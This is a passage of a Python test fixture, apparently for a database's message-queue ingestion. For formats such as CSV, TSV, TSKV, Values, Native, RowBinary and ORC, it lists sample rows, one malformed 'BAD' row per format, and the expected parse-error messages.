'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
        # JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION _CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> _CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x